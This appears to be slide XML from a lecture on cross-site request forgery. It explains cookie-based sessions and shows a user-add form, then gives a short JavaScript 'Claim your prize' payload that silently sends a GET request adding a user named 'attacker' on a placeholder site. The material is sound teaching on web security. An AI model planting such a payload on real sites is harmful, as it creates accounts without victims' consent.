            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> of browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> or session information is stored in local computers for a long time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A browser automatically appends the cookie to every HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Consequences of CSRF attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Depends on what HTTP requests are intended to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Changes of password and email, addition of an unauthorized user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3956284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742950" y="542411"/>
            <a:ext cx="7391400" cy="536027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A CSRF attack example </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672662" y="6248400"/>
            <a:ext cx="7430814" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.xyz.com/users.php?x=0&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=add&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=joe&amp; …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102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4438650" y="1194253"/>
            <a:ext cx="4495800" cy="5017220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74611" y="1619329"/>
            <a:ext cx="4362450" cy="4813737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;form method=“get" action="users.php"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"  value=“add" /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;input type="hidden" name="x" value="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;table &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>      &lt;td&gt;Login name:&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>      &lt;td&gt;&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" /&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>     &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>     …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    &lt;/table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   &lt;input type="submit" value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4048640" y="3702863"/>
            <a:ext cx="1" cy="319252"/>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16" name="Straight Connector 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4048641" y="3708540"/>
            <a:ext cx="3209409" cy="0"/>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19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7259639" y="3124962"/>
            <a:ext cx="0" cy="577901"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5461766" y="6077857"/>
            <a:ext cx="808502" cy="1588"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1526854435"/>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876300" y="714703"/>
            <a:ext cx="7391400" cy="536027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A CSRF attack example cont.</a:t>
            </a:r>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672662" y="2049787"/>
            <a:ext cx="6677025" cy="2352675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4827498"/>
            <a:ext cx="8305800" cy="1777700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A new user can be added by typing the URL into browser address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session information is appended automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A CSRF attack could add a user as well!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4043307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979714" y="517508"/>
            <a:ext cx="7391400" cy="536027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A CSRF attack example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4">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2186152" y="1303158"/>
            <a:ext cx="5297214" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379686" y="3650388"/>
            <a:ext cx="8479014" cy="3013840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type= "button" value ="Claim your prize" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "http://www.xyz.com/users.php ?x=0&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>action=add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp; name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“GET", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> , true);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3701143" y="2961619"/>
            <a:ext cx="3315782" cy="79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14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6758107" y="3220437"/>
            <a:ext cx="517636" cy="1588"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33132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ox(in)">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1143000" y="590589"/>
            <a:ext cx="7391400" cy="536027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A CSRF attack example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4">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1932073" y="1894844"/>
            <a:ext cx="4838700" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051"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2627398" y="4360316"/>
            <a:ext cx="3448050" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5641099"/>
            <a:ext cx="7848600" cy="1038225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A new user is just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>added</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CSRF attack types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
